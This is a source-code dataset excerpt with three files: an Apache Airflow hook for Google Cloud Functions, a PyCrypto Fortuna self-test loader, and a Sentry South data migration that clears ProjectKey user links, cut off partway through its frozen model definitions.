repo_name | path | copies | size | content | license
---|---|---|---|---|---|
nathanielvarona/airflow | airflow/providers/google/cloud/hooks/functions.py | 1 | 10000 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains a Google Cloud Functions Hook."""
import time
from typing import Any, Dict, List, Optional, Sequence, Union
import requests
from googleapiclient.discovery import build
from airflow.exceptions import AirflowException
from airflow.providers.google.common.hooks.base_google import GoogleBaseHook
# Time to sleep between active checks of the operation results
TIME_TO_SLEEP_IN_SECONDS = 1
class CloudFunctionsHook(GoogleBaseHook):
"""
Hook for the Google Cloud Functions APIs.
All the methods in the hook where project_id is used must be called with
keyword arguments rather than positional.
"""
_conn = None # type: Optional[Any]
def __init__(
self,
api_version: str,
gcp_conn_id: str = "google_cloud_default",
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
) -> None:
super().__init__(
gcp_conn_id=gcp_conn_id,
delegate_to=delegate_to,
impersonation_chain=impersonation_chain,
)
self.api_version = api_version
@staticmethod
def _full_location(project_id: str, location: str) -> str:
"""
Retrieve full location of the function in the form of
``projects/<GCP_PROJECT_ID>/locations/<GCP_LOCATION>``
:param project_id: The Google Cloud Project project_id where the function belongs.
:type project_id: str
:param location: The location where the function is created.
:type location: str
:return: The full location of the function.
"""
return f'projects/{project_id}/locations/{location}'
def get_conn(self) -> build:
"""
Retrieves the connection to Cloud Functions.
:return: Google Cloud Functions service object.
:rtype: googleapiclient.discovery.Resource
"""
if not self._conn:
http_authorized = self._authorize()
self._conn = build(
'cloudfunctions', self.api_version, http=http_authorized, cache_discovery=False
)
return self._conn
def get_function(self, name: str) -> dict:
"""
Returns the Cloud Function with the given name.
:param name: Name of the function.
:type name: str
:return: A Cloud Functions object representing the function.
:rtype: dict
"""
# fmt: off
return self.get_conn().projects().locations().functions().get( # pylint: disable=no-member
name=name).execute(num_retries=self.num_retries)
# fmt: on
@GoogleBaseHook.fallback_to_default_project_id
def create_new_function(self, location: str, body: dict, project_id: str) -> None:
"""
Creates a new function in Cloud Functions at the specified location.
:param location: The location of the function.
:type location: str
:param body: The body required by the Cloud Functions insert API.
:type body: dict
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().create( # pylint: disable=no-member
location=self._full_location(project_id, location),
body=body
).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
def update_function(self, name: str, body: dict, update_mask: List[str]) -> None:
"""
Updates a Cloud Function according to the specified update mask.
:param name: The name of the function.
:type name: str
:param body: The body required by the cloud function patch API.
:type body: dict
:param update_mask: The update mask - array of fields that should be patched.
:type update_mask: List[str]
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().patch( # pylint: disable=no-member
updateMask=",".join(update_mask),
name=name,
body=body
).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def upload_function_zip(self, location: str, zip_path: str, project_id: str) -> str:
"""
Uploads a zip file containing the function source code.
:param location: The location where the function is created.
:type location: str
:param zip_path: The path of the valid .zip file to upload.
:type zip_path: str
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: The upload URL returned by the generateUploadUrl method.
:rtype: str
"""
# fmt: off
# pylint: disable=no-member # noqa
response = \
self.get_conn().projects().locations().functions().generateUploadUrl(
parent=self._full_location(project_id, location)
).execute(num_retries=self.num_retries)
# fmt: on
upload_url = response.get('uploadUrl')
with open(zip_path, 'rb') as file:
requests.put(
url=upload_url,
data=file,
# These two headers need to be specified according to:
# https://cloud.google.com/functions/docs/reference/rest/v1/projects.locations.functions/generateUploadUrl
# nopep8
headers={
'Content-type': 'application/zip',
'x-goog-content-length-range': '0,104857600',
},
)
return upload_url
def delete_function(self, name: str) -> None:
"""
Deletes the specified Cloud Function.
:param name: The name of the function.
:type name: str
:return: None
"""
# fmt: off
response = self.get_conn().projects().locations().functions().delete( # pylint: disable=no-member
name=name).execute(num_retries=self.num_retries)
# fmt: on
operation_name = response["name"]
self._wait_for_operation_to_complete(operation_name=operation_name)
@GoogleBaseHook.fallback_to_default_project_id
def call_function(
self,
function_id: str,
input_data: Dict,
location: str,
project_id: str,
) -> dict:
"""
Synchronously invokes a deployed Cloud Function. Intended for testing
purposes only, as only very limited traffic is allowed.
:param function_id: ID of the function to be called
:type function_id: str
:param input_data: Input to be passed to the function
:type input_data: Dict
:param location: The location where the function is located.
:type location: str
:param project_id: Optional, Google Cloud Project project_id where the function belongs.
If set to None or missing, the default project_id from the Google Cloud connection is used.
:type project_id: str
:return: The response returned by the function.
:rtype: dict
"""
name = f"projects/{project_id}/locations/{location}/functions/{function_id}"
# fmt: off
response = self.get_conn().projects().locations().functions().call( # pylint: disable=no-member
name=name,
body=input_data
).execute(num_retries=self.num_retries)
# fmt: on
if 'error' in response:
raise AirflowException(response['error'])
return response
def _wait_for_operation_to_complete(self, operation_name: str) -> dict:
"""
Waits for the named operation to complete - checks status of the
asynchronous call.
:param operation_name: The name of the operation.
:type operation_name: str
:return: The response returned by the operation.
:rtype: dict
:exception: AirflowException in case error is returned.
"""
service = self.get_conn()
while True:
# fmt: off
operation_response = service.operations().get( # pylint: disable=no-member
name=operation_name,
).execute(num_retries=self.num_retries)
# fmt: on
if operation_response.get("done"):
response = operation_response.get("response")
error = operation_response.get("error")
# Note: according to the documentation, exactly one of "response" or
# "error" is set when "done" is True
if error:
raise AirflowException(str(error))
return response
time.sleep(TIME_TO_SLEEP_IN_SECONDS)
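# --- Usage sketch (illustrative only; not part of the upstream module). ---
# The connection id, project, location, and body below are assumptions made
# for illustration, not values taken from this file:
#
#   hook = CloudFunctionsHook(api_version='v1')
#   body = {
#       'name': 'projects/my-project/locations/us-central1/functions/hello',
#       'entryPoint': 'hello',
#       'runtime': 'python37',
#       'httpsTrigger': {},
#   }
#   hook.create_new_function(location='us-central1', body=body, project_id='my-project')
#   response = hook.call_function(function_id='hello', input_data={'data': '{}'},
#                                 location='us-central1', project_id='my-project')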
| apache-2.0 |
rorasa/KeeTerm | Crypto/SelfTest/Random/Fortuna/__init__.py | 118 | 1825 | # -*- coding: utf-8 -*-
#
# SelfTest/Random/Fortuna/__init__.py: Self-test for Fortuna modules
#
# Written in 2008 by Dwayne C. Litzenberger <[email protected]>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test for the Crypto.Random.Fortuna package"""
__revision__ = "$Id$"
import os
def get_tests(config={}):
tests = []
from Crypto.SelfTest.Random.Fortuna import test_FortunaAccumulator; tests += test_FortunaAccumulator.get_tests(config=config)
from Crypto.SelfTest.Random.Fortuna import test_FortunaGenerator; tests += test_FortunaGenerator.get_tests(config=config)
from Crypto.SelfTest.Random.Fortuna import test_SHAd256; tests += test_SHAd256.get_tests(config=config)
return tests
if __name__ == '__main__':
import unittest
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| mit |
argonemyth/sentry | src/sentry/migrations/0168_unfill_projectkey_user.py | 34 | 36774 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
ProjectKey = orm['sentry.ProjectKey']
ProjectKey.objects.filter(
user__isnull=False,
).update(user=None)
def backwards(self, orm):
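# Intentionally a no-op: the forwards migration discards the original
# ProjectKey.user values, so they cannot be restored.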
pass
models = {
'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': "orm['sentry.AlertRelatedGroup']", 'to': "orm['sentry.Group']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Alert']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'audit_actors'", 'to': "orm['sentry.User']"}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'last_synced': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.authprovider': {
'Meta': {'object_name': 'AuthProvider'},
'config': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'default_role': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'default_teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'unique': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'sync_time': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.broadcast': {
'Meta': {'object_name': 'Broadcast'},
'badge': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group', 'datetime'),)"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'event_set'", 'null': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'EventMapping'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.file': {
'Meta': {'object_name': 'File'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True'}),
'headers': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'storage': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'storage_options': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
